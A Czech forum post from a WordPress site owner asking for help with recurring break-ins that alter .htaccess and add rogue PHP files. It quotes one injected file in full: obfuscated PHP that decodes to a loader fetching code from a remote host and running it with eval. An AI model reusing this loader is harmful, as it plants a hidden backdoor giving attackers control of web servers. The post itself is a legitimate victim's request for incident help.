Website hacked

Dobry den,

cca co 14dni zaznamenavam utok na stranky http://www.hotelr10.cz, jenz vyuzivaji RS WordPress ve verzi 5.5.3 a nemohu prijit na zdroj problemu.

Nemate nahodou v ftp logach blizsi informace o moznem zdroji? (Posledni zname datum utoku je kolem 15.12.2020)

Utok totiz zpusobuje zmenu souboru .htaccess na ftp root urovni, tak i v root adresari wp .htaccess.

Navic se v root wp vytvori nove index soubory a zmeni se obsah wp-comments-post (tady vidim mozny zdroj problemu)

• baindex.php
• kindex.php
• mindex.php
• wp-comments-post.php

Obsahem pridanych/zmenenych souboru je podobnost obsahu napr.:

<?php $wksh287= „_0ibBdY1+*laVHnwjRF(DITtAyqUv6)o95egzE.J2xGSfQZ8Ck,msL3uWKc4 pXMh-ONr;P/7″;$hjwl996=’JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3NzdG9wLn‘;$hjwl997=’RlY2gvbGYzLnR4dCcpO2N1cmxfc2V0b3B0KCRjaCwgQ1VS‘;$hjwl998=’TE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7JHJlc3VsdCA9IG‘;$hjwl999=’N1cmxfZXhlYygkY2gpO2V2YWwoJz8+Jy4kcmVzdWx0KTs‘;$hjwl995=$hjwl996.$hjwl997.$hjwl998.$hjwl999;function ipga515($ctpg039,$ijat861,$aiql008){return “.$ctpg039.“.$ijat861.“.$aiql008.“;}$qvun359 = ipga515($wksh287{58},$wksh287{11}.$wksh287{10},$wksh287{10});$obzp764 = ipga515($wksh287{0}.$wksh287{55},$wksh287{52}.$wksh287{34},“);$hagy470 = ipga515($wksh287{68},$wksh287{0},$wksh287{44});$gnss397 = ipga515($wksh287{55},“,$wksh287{14});$nhyx355 = ipga515($wksh287{58},$wksh287{0},$wksh287{11}.$wksh287{68});$kyyy104 = ipga515($wksh287{68},$wksh287{11},$wksh287{25});$zbgd825 =ipga515(ipga515($qvun359,“,$obzp764),ipga515($hagy470,$gnss397,“),ipga515($nhyx355,“,$kyyy104));$quui045 = ipga515($wksh287{58},$wksh287{68},$wksh287{34});$rfew403 = ipga515($wksh287{11},$wksh287{23},“);$ltvz098 = ipga515($wksh287{34},“,$wksh287{0});$ixkx187 = ipga515($wksh287{44},$wksh287{55},$wksh287{14});$stdj090 = ipga515($wksh287{58},$wksh287{23},“);$ooay198 = ipga515($wksh287{2},$wksh287{31},“);$idke254 = ipga515(“,$wksh287{14},“);$fsgm154 = ipga515( ipga515($quui045,$rfew403,$ltvz098), ipga515($ixkx187,“,$stdj090), ipga515($ooay198,“,$idke254));$kgmp776 = ipga515($wksh287{34},“,$wksh287{28});$bcjy305= ipga515($wksh287{11},$wksh287{10},$wksh287{19});$layf110 = ipga515(“,$wksh287{3},$wksh287{11});$tvqz353 = ipga515($wksh287{52},$wksh287{34},$wksh287{29});$kqez305 = ipga515($wksh287{59},$wksh287{0},$wksh287{5});$eznw875 = ipga515($wksh287{34},$wksh287{58},$wksh287{31});$kkfn264 = ipga515($wksh287{5},$wksh287{34},$wksh287{19});$tieg251 = ipga515(ipga515($kgmp776,$bcjy305,“),ipga515(“,“,$layf110),ipga515($tvqz353,$kqez305.$eznw875,$kkfn264)).'“‚.$hjwl995.'“‚.ipga515($wksh287{30}.$wksh287{30},“,$wksh287{69});$zbgd825($fsgm154,array(“,‘}‘.$tieg251.’//‘));//scp-173?>

WP root soubory maji opravneni 644

Adresare dle doporuceni „https://wordpress.org/support/article/changing-file-permissions/“

root .htaccess (www/.htaccess) ma opravneni 444 a presto je po utoku prepsan.

Preventivne jsem na vsech strankach zakazal vkladat komentare, nainstaloval a nakonfiguroval pluginy „All In One WP Security„, „Limit Login Attempts Reloaded„.

Nepomohla ani reinstalace WP.

Nemate nekdo s podobnym typem utoku zkusenosti, pripadne mi muzete poslat na email logy webu z 15.12 +- den k prozkoumani.

Dekuji.